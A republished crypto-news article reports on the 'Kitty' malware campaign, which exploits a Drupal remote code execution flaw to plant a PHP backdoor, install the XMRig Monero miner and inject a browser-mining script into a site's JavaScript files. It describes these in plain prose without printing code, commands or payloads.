A Malware Delivery Server By Cryptovest

Monero’s CryptoKitty: A Malware Delivery Server

Hackers’ fascination with Monero doesn’t appear to be slowing down. As servers barely begin to recover from the onslaught of exploits that mined Monero using their processors, another remote code execution vulnerability is attacking systems running Drupal.

The researchers at Help Net Security that discovered it gave it the moniker “Kitty” due to the fact that the malware is delivered from a folder with this name. Don’t let the cute name fool you: This exploit injects code into the server that would continue to work even if the administrator removes Drupal from it.

“Once the Kitty bash script is executed, a PHP file named kdrupal.php is written to the infected server disc. In doing so, the attacker reinforces their foothold in the infected server and guarantees dominance using a backdoor independent of the Drupal vulnerability,” the company wrote in its report.

The script first authenticates the attacker, making sure no one else can access its functions. Then, it registers a scheduled service that repeatedly downloads and executes a script to ensure that the server remains infected.

“Once the attacker gets a persistent hold of the server, a mining program ‘kkworker,’ which is the well-known XMRig Monero miner, is installed and starts the mining process,” the company added.

Kitty isn’t done yet, though.

It might have control of a powerful server to do its bidding, but Kitty is a greedy creature. The attack also involves a mining script, labeled “me0w.js,” which injects itself into every JavaScript file on the server imaginable.

Inside the script, we also can see code that uses visitors’ CPUs to mine Monero to the hacker’s wallet.

Further in the code, we can also find a statement from the hacker that reads, “don’t delete pls i am a harmless cute little kitty.”

Help Net Security responded to this finding with, “Good thing we’re dog people.”

It bears mentioning that this particular exploit is a variant on the “Drupalgeddon 2.0” series of attacks, in which over 300 servers running Drupal—including sites like the San Diego Zoo and the government of Chihuahua, Mexico—were forced to mine Monero for a hacker.

This article appeared first on Cryptovest

Disclaimer: Fusion Media would like to remind you that the data contained in this website is not necessarily real-time nor accurate. All CFDs (stocks, indexes, futures) and Forex prices are not provided by exchanges but rather by market makers, and so prices may not be accurate and may differ from the actual market price, meaning prices are indicative and not appropriate for trading purposes. Therefore Fusion Media doesn`t bear any responsibility for any trading losses you might incur as a result of using this data.

Fusion Media or anyone involved with Fusion Media will not accept any liability for loss or damage as a result of reliance on the information including data, quotes, charts and buy/sell signals contained within this website. Please be fully informed regarding the risks and costs associated with trading the financial markets, it is one of the riskiest investment forms possible.

Source link

Related Posts

Add Comment